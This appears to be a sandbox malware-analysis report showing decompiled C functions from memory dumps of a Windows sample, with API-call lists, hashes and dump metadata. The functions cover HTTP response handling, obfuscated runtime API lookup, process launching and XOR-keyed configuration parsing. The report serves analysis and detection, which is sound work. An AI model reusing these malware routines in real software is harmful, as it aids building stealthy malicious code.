                            • Instruction ID: 4bf7fbc6b4a533b9d419e9dcef3af3f93a7fea54f22d486473ce7361191e8c6c
                            • Opcode Fuzzy Hash: fd9099a50fa455978c527e373530f8e736734661954759eb43fea4e81f39fb81
                            • Instruction Fuzzy Hash: 6661D73174060E8FDBA9CF29C98077977A6EB44354F248029DB16C76A6EB30DD4AC743
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
                            • Instruction ID: 28917c33e972d7e849404616ae49b67ced40a3452eb4f2b5b9f55cb3c8db3b58
                            • Opcode Fuzzy Hash: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
                            • Instruction Fuzzy Hash: E241E476916292CFC71A8F78C8DA299FBB2FF0631135946CDC0D29F166C7326146CB4A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
                            • Instruction ID: 26d406924a3b394a99823ca2fef909a93921f6e5dbb8563635c3cf7f267aa8fc
                            • Opcode Fuzzy Hash: d2c6ec9702789d8c300688549ffa4c1610bc1884ebbce0ad54c1bc9b0827d967
                            • Instruction Fuzzy Hash: 8441F376916291CFC71ACF78C8DA6A5FBB2FF0631035946DDC092AF166C3226146CB4A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E100020C4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                            				intOrPtr _v8;
                            				char _v12;
                            				void* __ebp;
                            				signed int* _t43;
                            				char _t44;
                            				void* _t46;
                            				void* _t49;
                            				intOrPtr* _t53;
                            				void* _t54;
                            				void* _t65;
                            				long _t66;
                            				signed int* _t80;
                            				signed int* _t82;
                            				void* _t84;
                            				signed int _t86;
                            				void* _t89;
                            				void* _t95;
                            				void* _t96;
                            				void* _t99;
                            				void* _t106;
                            
                            				_t43 = _t84;
                            				_t65 = __ebx + 2;
                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                            				_t89 = _t95;
                            				_t96 = _t95 - 8;
                            				_push(_t65);
                            				_push(_t84);
                            				_push(_t89);
                            				asm("cld");
                            				_t66 = _a8;
                            				_t44 = _a4;
                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                            					_push(_t89);
                            					E1000222B(_t66 + 0x10, _t66, 0xffffffff);
                            					_t46 = 1;
                            				} else {
                            					_v12 = _t44;
                            					_v8 = _a12;
                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                            					_t86 =  *(_t66 + 0xc);
                            					_t80 =  *(_t66 + 8);
                            					_t49 = E100022E5(_t66);
                            					_t99 = _t96 + 4;
                            					if(_t49 == 0) {
                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                            						goto L11;
                            					} else {
                            						while(_t86 != 0xffffffff) {
                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                            							if(_t53 == 0) {
                            								L8:
                            								_t80 =  *(_t66 + 8);
                            								_t86 = _t80[_t86 + _t86 * 2];
                            								continue;
                            							} else {
                            								_t54 =  *_t53();
                            								_t89 = _t89;
                            								_t86 = _t86;
                            								_t66 = _a8;
                            								_t55 = _t54;
                            								_t106 = _t54;
                            								if(_t106 == 0) {
                            									goto L8;
                            								} else {
                            									if(_t106 < 0) {
                            										_t46 = 0;
                            									} else {
                            										_t82 =  *(_t66 + 8);
                            										E100021D0(_t55, _t66);
                            										_t89 = _t66 + 0x10;
                            										E1000222B(_t89, _t66, 0);
                            										_t99 = _t99 + 0xc;
                            										E100022C7(_t82[2]);
                            										 *(_t66 + 0xc) =  *_t82;
                            										_t66 = 0;
                            										_t86 = 0;
                            										 *(_t82[2])(1);
                            										goto L8;
                            									}
                            								}
                            							}
                            							goto L13;
                            						}
                            						L11:
                            						_t46 = 1;
                            					}
                            				}
                            				L13:
                            				return _t46;
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                            • Instruction ID: c8d982c37bd274d3d8930fd0680bbdacd8505101835a543198bcaa48f6ba8aeb
                            • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                            • Instruction Fuzzy Hash: F321C536900205BFDB10DF68CCC09ABBBA5FF49390B468569ED159B24ADB30F915CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00CFB09C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                            				intOrPtr _v8;
                            				char _v12;
                            				void* __ebp;
                            				signed int* _t43;
                            				char _t44;
                            				void* _t46;
                            				void* _t49;
                            				intOrPtr* _t53;
                            				void* _t54;
                            				void* _t65;
                            				long _t66;
                            				signed int* _t80;
                            				signed int* _t82;
                            				void* _t84;
                            				signed int _t86;
                            				void* _t89;
                            				void* _t95;
                            				void* _t96;
                            				void* _t99;
                            				void* _t106;
                            
                            				_t43 = _t84;
                            				_t65 = __ebx + 2;
                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                            				_t89 = _t95;
                            				_t96 = _t95 - 8;
                            				_push(_t65);
                            				_push(_t84);
                            				_push(_t89);
                            				asm("cld");
                            				_t66 = _a8;
                            				_t44 = _a4;
                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                            					_push(_t89);
                            					E00CFB207(_t66 + 0x10, _t66, 0xffffffff);
                            					_t46 = 1;
                            				} else {
                            					_v12 = _t44;
                            					_v8 = _a12;
                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                            					_t86 =  *(_t66 + 0xc);
                            					_t80 =  *(_t66 + 8);
                            					_t49 = E00CFB2C1(_t66);
                            					_t99 = _t96 + 4;
                            					if(_t49 == 0) {
                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                            						goto L11;
                            					} else {
                            						while(_t86 != 0xffffffff) {
                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                            							if(_t53 == 0) {
                            								L8:
                            								_t80 =  *(_t66 + 8);
                            								_t86 = _t80[_t86 + _t86 * 2];
                            								continue;
                            							} else {
                            								_t54 =  *_t53();
                            								_t89 = _t89;
                            								_t86 = _t86;
                            								_t66 = _a8;
                            								_t55 = _t54;
                            								_t106 = _t54;
                            								if(_t106 == 0) {
                            									goto L8;
                            								} else {
                            									if(_t106 < 0) {
                            										_t46 = 0;
                            									} else {
                            										_t82 =  *(_t66 + 8);
                            										E00CFB1AC(_t55, _t66);
                            										_t89 = _t66 + 0x10;
                            										E00CFB207(_t89, _t66, 0);
                            										_t99 = _t99 + 0xc;
                            										E00CFB2A3(_t82[2]);
                            										 *(_t66 + 0xc) =  *_t82;
                            										_t66 = 0;
                            										_t86 = 0;
                            										 *(_t82[2])(1);
                            										goto L8;
                            									}
                            								}
                            							}
                            							goto L13;
                            						}
                            						L11:
                            						_t46 = 1;
                            					}
                            				}
                            				L13:
                            				return _t46;
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: befa44286c2333722b4bcc0afff04c8b74fb9c5aa175bee6864e15d5369b148d
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: C321C4729002099BCB14DF68CCD09BBBBA5FF45350B06C168EA259B245DB30FE15CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 56%
                            			E00CF15EE(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				signed int _v20;
                            				void* __esi;
                            				intOrPtr _t42;
                            				intOrPtr _t44;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            				int _t49;
                            				intOrPtr _t53;
                            				WCHAR* _t56;
                            				void* _t57;
                            				int _t58;
                            				intOrPtr _t64;
                            				void* _t69;
                            				intOrPtr* _t73;
                            				void* _t74;
                            				intOrPtr _t75;
                            				intOrPtr _t79;
                            				intOrPtr* _t85;
                            				intOrPtr _t88;
                            
                            				_t74 = __ecx;
                            				_t79 =  *0xcfd33c; // 0x3179ba0
                            				_v20 = 8;
                            				_v16 = GetTickCount();
                            				_t42 = E00CF3586(_t74,  &_v16);
                            				_v12 = _t42;
                            				if(_t42 == 0) {
                            					_v12 = 0xcfc1ac;
                            				}
                            				_t44 = E00CF5161(_t79);
                            				_v8 = _t44;
                            				if(_t44 != 0) {
                            					_t85 = __imp__;
                            					_t46 =  *_t85(_v12, _t69);
                            					_t47 =  *_t85(_v8);
                            					_t48 =  *_t85(_a4);
                            					_t49 = lstrlenW(_a8);
                            					_t53 = E00CF8D59(lstrlenW(0xcfeb28) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xcfeb28) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                            					_v16 = _t53;
                            					if(_t53 != 0) {
                            						_t75 =  *0xcfd2a4; // 0x247a5a8
                            						_t73 = E00CFD11C; // 0xcfab91
                            						_t18 = _t75 + 0xcfeb28; // 0x530025
                            						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                            						_t56 =  *_t85(_v8);
                            						_a8 = _t56;
                            						_t57 =  *_t85(_a4);
                            						_t58 = lstrlenW(_a12);
                            						_t88 = E00CF8D59(lstrlenW(0xcfec48) + _a8 + _t57 + _t58 + lstrlenW(0xcfec48) + _a8 + _t57 + _t58 + 2);
                            						if(_t88 == 0) {
                            							E00CF677C(_v16);
                            						} else {
                            							_t64 =  *0xcfd2a4; // 0x247a5a8
                            							_t31 = _t64 + 0xcfec48; // 0x73006d
                            							 *_t73(_t88, _t31, _a4, _v8, _a12);
                            							 *_a16 = _v16;
                            							_v20 = _v20 & 0x00000000;
                            							 *_a20 = _t88;
                            						}
                            					}
                            					E00CF677C(_v8);
                            				}
                            				return _v20;
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00CF1603
                            • lstrlen.KERNEL32(00000000,80000002), ref: 00CF163E
                            • lstrlen.KERNEL32(?), ref: 00CF1647
                            • lstrlen.KERNEL32(00000000), ref: 00CF164E
                            • lstrlenW.KERNEL32(80000002), ref: 00CF165C
                            • lstrlenW.KERNEL32(00CFEB28), ref: 00CF1665
                            • lstrlen.KERNEL32(?), ref: 00CF16A9
                            • lstrlen.KERNEL32(?), ref: 00CF16B1
                            • lstrlenW.KERNEL32(?), ref: 00CF16BC
                            • lstrlenW.KERNEL32(00CFEC48), ref: 00CF16C5
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: lstrlen$CountFreeHeapTick
                            • String ID:
                            • API String ID: 2535036572-0
                            • Opcode ID: 843b7da252760656f3d34c144160d445429eb8fe42529f1e388c5c3c9d13a9ff
                            • Instruction ID: 1514438ea7b6494a31acf04cb1931f81acf119ade2167948ce675929487b9300
                            • Opcode Fuzzy Hash: 843b7da252760656f3d34c144160d445429eb8fe42529f1e388c5c3c9d13a9ff
                            • Instruction Fuzzy Hash: 5431477290020DEFCF01AFA4CC84AAEBFB5EF48314B054056EA18A7221DB31DA15DF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00CF8D99(void* __eax, void* __ecx) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v28;
                            				long _v32;
                            				void _v104;
                            				char _v108;
                            				long _t36;
                            				intOrPtr _t39;
                            				intOrPtr _t46;
                            				intOrPtr _t49;
                            				void* _t57;
                            				void* _t66;
                            				intOrPtr _t67;
                            				intOrPtr* _t68;
                            				intOrPtr* _t69;
                            
                            				_t1 = __eax + 0x14; // 0x74183966
                            				_t67 =  *_t1;
                            				_t36 = E00CF933F(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                            				_v8 = _t36;
                            				if(_t36 != 0) {
                            					L12:
                            					return _v8;
                            				}
                            				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                            				_t39 = _v12(_v12);
                            				_v8 = _t39;
                            				if(_t39 == 0 && ( *0xcfd260 & 0x00000001) != 0) {
                            					_v32 = 0;
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					_v108 = 0;
                            					memset( &_v104, 0, 0x40);
                            					_t46 =  *0xcfd2a4; // 0x247a5a8
                            					_t18 = _t46 + 0xcfe3e6; // 0x73797325
                            					_t66 = E00CF27B6(_t18);
                            					if(_t66 == 0) {
                            						_v8 = 8;
                            					} else {
                            						_t49 =  *0xcfd2a4; // 0x247a5a8
                            						_t19 = _t49 + 0xcfe747; // 0x3178cef
                            						_t20 = _t49 + 0xcfe0af; // 0x4e52454b
                            						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                            						if(_t69 == 0) {
                            							_v8 = 0x7f;
                            						} else {
                            							_v108 = 0x44;
                            							E00CF94FB();
                            							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                            							_push(1);
                            							E00CF94FB();
                            							if(_t57 == 0) {
                            								_v8 = GetLastError();
                            							} else {
                            								CloseHandle(_v28);
                            								CloseHandle(_v32);
                            							}
                            						}
                            						HeapFree( *0xcfd238, 0, _t66);
                            					}
                            				}
                            				_t68 = _v16;
                            				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                            				E00CF677C(_t68);
                            				goto L12;
                            			}

                            APIs
                              • Part of subcall function 00CF933F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00CF8DB5,?,00000001,?,?,00000000,00000000), ref: 00CF9364
                              • Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00CF9386
                              • Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00CF939C
                              • Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00CF93B2
                              • Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00CF93C8
                              • Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00CF93DE
                            • memcpy.NTDLL(00000001,?,?,?,00000001,?,?,00000000,00000000), ref: 00CF8DCB
                            • memset.NTDLL ref: 00CF8E06
                              • Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00CF5073,63699BCE,00CF52BC,73797325), ref: 00CF27C7
                              • Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00CF27E1
                            • GetModuleHandleA.KERNEL32(4E52454B,03178CEF,73797325), ref: 00CF8E3C
                            • GetProcAddress.KERNEL32(00000000), ref: 00CF8E43
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00CF8EAB
                              • Part of subcall function 00CF94FB: GetProcAddress.KERNEL32(36776F57,00CF341A), ref: 00CF9516
                            • CloseHandle.KERNEL32(00000000,00000001), ref: 00CF8E88
                            • CloseHandle.KERNEL32(?), ref: 00CF8E8D
                            • GetLastError.KERNEL32(00000001), ref: 00CF8E91
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                            • String ID:
                            • API String ID: 478747673-0
                            • Opcode ID: 7b10acf8025265fbb93054ec55d169fd4538767fc2217dcd9ee9fc68ea71d716
                            • Instruction ID: c1dfd9e3ed9224a4e5ce8fa1d71e647358ca23e3d83c8edaf9d96bb56c94426e
                            • Opcode Fuzzy Hash: 7b10acf8025265fbb93054ec55d169fd4538767fc2217dcd9ee9fc68ea71d716
                            • Instruction Fuzzy Hash: 7031527590020DEFDB50AFA4DD89EBEBBBDEB08304F100465E706A7121DB345E49DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CFA359(void* __ecx, void* __esi) {
                            				long _v8;
                            				long _v12;
                            				long _v16;
                            				long _v20;
                            				long _t34;
                            				long _t39;
                            				long _t42;
                            				long _t56;
                            				void* _t58;
                            				void* _t59;
                            				void* _t61;
                            
                            				_t61 = __esi;
                            				_t59 = __ecx;
                            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                            				do {
                            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                            					_v20 = _t34;
                            					if(_t34 != 0) {
                            						L3:
                            						_v8 = 4;
                            						_v16 = 0;
                            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                            							_t39 = GetLastError();
                            							_v12 = _t39;
                            							if(_v20 == 0 || _t39 != 0x2ef3) {
                            								L15:
                            								return _v12;
                            							} else {
                            								goto L11;
                            							}
                            						}
                            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                            							goto L11;
                            						} else {
                            							_v16 = 0;
                            							_v8 = 0;
                            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                            							_t58 = E00CF8D59(_v8 + 1);
                            							if(_t58 == 0) {
                            								_v12 = 8;
                            							} else {
                            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                            									E00CF677C(_t58);
                            									_v12 = GetLastError();
                            								} else {
                            									 *((char*)(_t58 + _v8)) = 0;
                            									 *(_t61 + 0xc) = _t58;
                            								}
                            							}
                            							goto L15;
                            						}
                            					}
                            					SetEvent( *(_t61 + 0x1c));
                            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                            					_v12 = _t56;
                            					if(_t56 != 0) {
                            						goto L15;
                            					}
                            					goto L3;
                            					L11:
                            					_t42 = E00CF9837( *(_t61 + 0x1c), _t59, 0xea60);
                            					_v12 = _t42;
                            				} while (_t42 == 0);
                            				goto L15;
                            			}

                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 00CFA370
                            • SetEvent.KERNEL32(?), ref: 00CFA380
                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 00CFA3B2
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00CFA3D7
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00CFA3F7
                            • GetLastError.KERNEL32 ref: 00CFA409
                              • Part of subcall function 00CF9837: WaitForMultipleObjects.KERNEL32(00000002,00CFA9FB,00000000,00CFA9FB,?,?,?,00CFA9FB,0000EA60), ref: 00CF9852
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            • GetLastError.KERNEL32(00000000), ref: 00CFA43E
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 3369646462-0
                            • Opcode ID: 551b3a1419e1d79466aadef99a93b8b5da3b9ecd3ce1e1c9a698648ce2111274
                            • Instruction ID: 700ab90324280e94827771b33ba0e351381e922074c94a4bafaa731a22b382b1
                            • Opcode Fuzzy Hash: 551b3a1419e1d79466aadef99a93b8b5da3b9ecd3ce1e1c9a698648ce2111274
                            • Instruction Fuzzy Hash: 3D3142B590030CEFDB61DFA5C9C4ABEFBB8EB08304F10496AE616A2151D774DA05DF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00CF1A30(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _t9;
                            				intOrPtr _t13;
                            				char* _t28;
                            				void* _t33;
                            				void* _t34;
                            				char* _t36;
                            				intOrPtr* _t40;
                            				char* _t41;
                            				char* _t42;
                            				char* _t43;
                            
                            				_t34 = __edx;
                            				_push(__ecx);
                            				_t9 =  *0xcfd2a4; // 0x247a5a8
                            				_t1 = _t9 + 0xcfe62c; // 0x253d7325
                            				_t36 = 0;
                            				_t28 = E00CF62FC(__ecx, _t1);
                            				if(_t28 != 0) {
                            					_t40 = __imp__;
                            					_t13 =  *_t40(_t28);
                            					_v8 = _t13;
                            					_t41 = E00CF8D59(_v8 +  *_t40(_a4) + 1);
                            					if(_t41 != 0) {
                            						strcpy(_t41, _t28);
                            						_pop(_t33);
                            						__imp__(_t41, _a4);
                            						_t36 = E00CF98DC(_t34, _t41, _a8);
                            						E00CF677C(_t41);
                            						_t42 = E00CFA79A(StrTrimA(_t36, "="), _t36);
                            						if(_t42 != 0) {
                            							E00CF677C(_t36);
                            							_t36 = _t42;
                            						}
                            						_t43 = E00CF226B(_t36, _t33);
                            						if(_t43 != 0) {
                            							E00CF677C(_t36);
                            							_t36 = _t43;
                            						}
                            					}
                            					E00CF677C(_t28);
                            				}
                            				return _t36;
                            			}

                            APIs
                              • Part of subcall function 00CF62FC: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,00CF1A4A,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?), ref: 00CF6363
                              • Part of subcall function 00CF62FC: sprintf.NTDLL ref: 00CF6384
                            • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?,031795B0), ref: 00CF1A5B
                            • lstrlen.KERNEL32(?,?,?,00CF1EFB,?,031795B0), ref: 00CF1A63
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • strcpy.NTDLL ref: 00CF1A7A
                            • lstrcat.KERNEL32(00000000,?), ref: 00CF1A85
                              • Part of subcall function 00CF98DC: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00CF1A94,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF98F3
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF1AA2
                              • Part of subcall function 00CFA79A: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00CF1AAE,00000000,?,?,00CF1EFB,?,031795B0), ref: 00CFA7A4
                              • Part of subcall function 00CFA79A: _snprintf.NTDLL ref: 00CFA802
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: 8de26df75be9abca8f4ace055eb66875490f395dff3f106c3d43b2cf10a87633
                            • Instruction ID: e91b1c87e5ed04e280c87c215ce9718cd067ff4a7f491eedd61c88fb08b2a1d1
                            • Opcode Fuzzy Hash: 8de26df75be9abca8f4ace055eb66875490f395dff3f106c3d43b2cf10a87633
                            • Instruction Fuzzy Hash: 86110637A0152DBB4B52B7B99C85E7F7ABDDE497A43050016FB0497112CE35CD02A7A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00CF2E55(int* __ecx) {
                            				int _v8;
                            				void* _v12;
                            				void* __esi;
                            				signed int _t18;
                            				signed int _t23;
                            				char* _t29;
                            				char* _t30;
                            				char* _t31;
                            				char* _t32;
                            				char* _t33;
                            				void* _t34;
                            				void* _t35;
                            				signed int _t40;
                            				void* _t42;
                            				void* _t43;
                            				signed int _t45;
                            				signed int _t49;
                            				signed int _t53;
                            				signed int _t57;
                            				signed int _t61;
                            				signed int _t65;
                            				void* _t70;
                            				intOrPtr _t85;
                            
                            				_t71 = __ecx;
                            				_t18 =  *0xcfd2a0; // 0x63699bc3
                            				if(E00CF3034( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                            					 *0xcfd2d0 = _v12;
                            				}
                            				_t23 =  *0xcfd2a0; // 0x63699bc3
                            				if(E00CF3034( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
                            					_push(2);
                            					_pop(0);
                            					goto L48;
                            				} else {
                            					_t70 = _v12;
                            					if(_t70 == 0) {
                            						_t29 = 0;
                            					} else {
                            						_t65 =  *0xcfd2a0; // 0x63699bc3
                            						_t29 = E00CF6676(_t71, _t70, _t65 ^ 0x724e87bc);
                            					}
                            					if(_t29 != 0) {
                            						_t71 =  &_v8;
                            						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                            							 *0xcfd240 = _v8;
                            						}
                            					}
                            					if(_t70 == 0) {
                            						_t30 = 0;
                            					} else {
                            						_t61 =  *0xcfd2a0; // 0x63699bc3
                            						_t30 = E00CF6676(_t71, _t70, _t61 ^ 0x2b40cc40);
                            					}
                            					if(_t30 != 0) {
                            						_t71 =  &_v8;
                            						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                            							 *0xcfd244 = _v8;
                            						}
                            					}
                            					if(_t70 == 0) {
                            						_t31 = 0;
                            					} else {
                            						_t57 =  *0xcfd2a0; // 0x63699bc3
                            						_t31 = E00CF6676(_t71, _t70, _t57 ^ 0x3b27c2e6);
                            					}
                            					if(_t31 != 0) {
                            						_t71 =  &_v8;
                            						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                            							 *0xcfd248 = _v8;
                            						}
                            					}
                            					if(_t70 == 0) {
                            						_t32 = 0;
                            					} else {
                            						_t53 =  *0xcfd2a0; // 0x63699bc3
                            						_t32 = E00CF6676(_t71, _t70, _t53 ^ 0x0602e249);
                            					}
                            					if(_t32 != 0) {
                            						_t71 =  &_v8;
                            						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                            							 *0xcfd004 = _v8;
                            						}
                            					}
                            					if(_t70 == 0) {
